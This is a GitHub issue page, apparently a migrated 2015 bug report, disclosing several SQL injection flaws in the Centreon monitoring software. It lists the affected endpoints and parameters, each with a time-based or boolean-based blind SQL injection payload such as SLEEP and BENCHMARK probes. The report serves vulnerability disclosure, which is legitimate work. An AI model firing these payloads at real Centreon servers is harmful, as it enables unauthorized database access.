You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Dec 13, 2022. It is now read-only.
Method: POST
URL: /centreon/include/home/customView/action.php
Parameter: user_id[]
Payload: user_id[]=18 AND (SELECT * FROM (SELECT(SLEEP(5))) YGTW)
Comments:
Post authentication
AND/OR time-based blind SQL injection
Method: GET
URL: /centreon/include/monitoring/objectDetails/xml/hostSendCommand.php?cmd=host_passive_checks&host_id=&sid=[Number]&actiontype=0
Parameter: host_id
Payloads:
host_id=14 RLIKE (SELECT (CASE WHEN (6703=6703) THEN 14 ELSE 0x28 END))
host_id=14 AND (SELECT * FROM (SELECT (SLEEP(3))) ZaDF)
Comments:
Post Authentication
Boolean-based blind SQL injection
AND/OR time-base blind SQL injection
Method: GET
URL: /centreon/include/monitoring/status/Hosts/xml/broker/hostXML.php?sid=[Number]&search=erer&num=0&limit=30&sort_type=host_name&order=ASC&p=20102&time=[Number]&criticality=0
Parameter: order
Payloads :
ASC, (SELECT * FROM (SELECT(SLEEP(20)))a)
-1629 OR 8329=BENCHMARK(3000000,MD5(0x584f4a6f))
Comment:
Author Name: Louis Ferret (Louis Ferret)
Original Redmine Issue: 6452, https://forge.centreon.com/issues/6452
Original Date: 2015-06-30
Here are some pages which allow SQL injections :
Method: POST
URL: /centreon/include/home/customView/action.php
Parameter: user_id[]
Payload: user_id[]=18 AND (SELECT * FROM (SELECT(SLEEP(5))) YGTW)
Comments:
Method: GET
URL: /centreon/include/monitoring/objectDetails/xml/hostSendCommand.php?cmd=host_passive_checks&host_id=&sid=[Number]&actiontype=0
Parameter: host_id
Payloads:
Comments:
Method: GET
URL: /centreon/include/monitoring/status/Hosts/xml/broker/hostXML.php?sid=[Number]&search=erer&num=0&limit=30&sort_type=host_name&order=ASC&p=20102&time=[Number]&criticality=0
Parameter: order
Payloads :
Comment:
Method: GET
URL: /centreon/include/views/graphs/GetXmlTree.php?search_host=&search_service=&sid=[Number]&uid=[Number]&id=[ID]
Parameter: sid
Payload: '+(SELECT * FROM(SELECT(SLEEP(20)))a)+'
Comments:
Method: POST
URL: /centreon/main.php?p=3
Parameter: host
Payload: 14 AND (SELECT * FROM (SELECT (SLEEP(10)))a)--
Comments:
Note that I am copying this by hand so I may write a few typos from time to time.
The text was updated successfully, but these errors were encountered: